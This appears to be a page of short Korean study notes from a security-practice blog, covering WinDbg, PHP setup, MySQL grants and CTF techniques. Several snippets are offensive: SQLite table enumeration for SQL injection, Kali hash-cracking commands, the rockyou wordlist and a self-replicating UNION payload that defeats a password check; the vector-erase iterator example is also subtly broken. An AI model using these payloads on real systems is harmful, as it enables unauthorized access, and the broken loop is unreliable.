연습 또 연습.

심볼 안 잡히면...srv 추가 후.reload -i windbg 확장모듈!exploitableexception이 발생한 상태에서 exploitable한지 알려준다- down: http://msecdbg.codeplex.com/releases/view/28935 winext 서브폴더에 복사하고 windbg 재시작- usage : > !load winext/msec.dll > !exploitable

std vector erase 방법 두 가지 ------------------------------------------std::vector v; for (int i = 0; i < v.size(); i++) {if (n == v[i]) {v.erase(v.begin()+i);} } ------------------------------------------// iteratorfor(auto it; it != v.end(); it++) {if(n==*it)it = v.erase(it);}

레포지토리 추가$ sudo add-apt-repository ppa:ondrej/php$ sudo apt-get update (레포 추가 후 PUB KEY 에러 : https://askubuntu.com/questions/13065/how-do-i-fix-the-gpg-error-no-pubkey) php5.6기본패키지$ sudo apt-get install php5.6 php5.6-common php5.6-mysql 추가패키지$ sudo apt-get install php5.6-curl php5.6-xml php5.6-zip php5.6-gd php5.6-mbstring php5.6-mcrypt php7.1기본 패키지$ sudo apt-get install php7.1 php7.1-common php7..

Switch PHP version ( Apache ):from php5.6 to php7.0: sudo a2dismod php5.6 ; sudo a2enmod php7.0 ; sudo service apache2 restartfrom php7.0 to php5.6: sudo a2dismod php7.0 ; sudo a2enmod php5.6 ; sudo service apache2 restart (아직 테스트는 못 해봄..)

rootme-.org에는 SQLite로 된 문제가 종종 있다.(심지어 postgreSQL도 있다.) SQLite에는 information_schema가 없다.그대신 SQLite에는 sqlite_master라는게 있다. 테이블 명과 컬럼 명을 빼낼 때 아래와 같이 하면 된다. # select table_name from information_schema.tables== select name from sqlite_master(또는 select tbl_name from sqlite_master) select sql from sqlite_master결과-> CREATE TABLE users(username TEXT, password TEXT, Year INTEGER)-> 모든 테이블에 대해 수행... etc)주..

sudo dpkg --add-architecture i386sudo apt updatesudo apt install libc6:i386 libncurses5:i386 libstdc++6:i386 zlib1g:i386sudo apt install gcc-multilib

칼리에서 해시 크랙(?) hash-identifier로 해시 종류 파악. 그 후 findmyhash로 해시 검색 root@kali:~# findmyhash sha1 -h 4eec6b9c6e464c35fff1efb8444dd0ac1ae67b30

1. 계정 추가 mysql> create user userid@localhost identified by '비밀번호'; 계정 삭제mysql> drop user userid@localhost; 2. DB, table에 권한 주기mysql> grant select, insert, update privileges on DB명.테이블 to 아이디@host identified by '비밀번호';mysql> grant all privileges on DB명.테이블 to 아이디@host identified by '비밀번호';

/usr/share/wordlists/rockyou.txthttp://scrapmaker.com/data/wordlists/dictionaries/rockyou.txt

아래와 같이 입력받은 값과 쿼리의 리턴값이 같으면 인증되는 코드가 있다고 하자. if ($_GET['pw'] === $result['pw']) echo " CONG !! "; 아래와 같이 쿼리를 날려주면 리턴값을 입력값과 같게 만들 수 있다. mysql> select pw from prob_1 where id='' and pw=''union select REPLACE(@v:='\'union select REPLACE(@v:=\'2\',1+1,REPLACE(REPLACE(@v,\'\\\\\',\'\\\\\\\\\'),\'\\\'\',\'\\\\\\\'\'));',1+1,REPLACE(REPLACE(@v,'\\','\\\\'),'\'','\\\''));+------------------------------..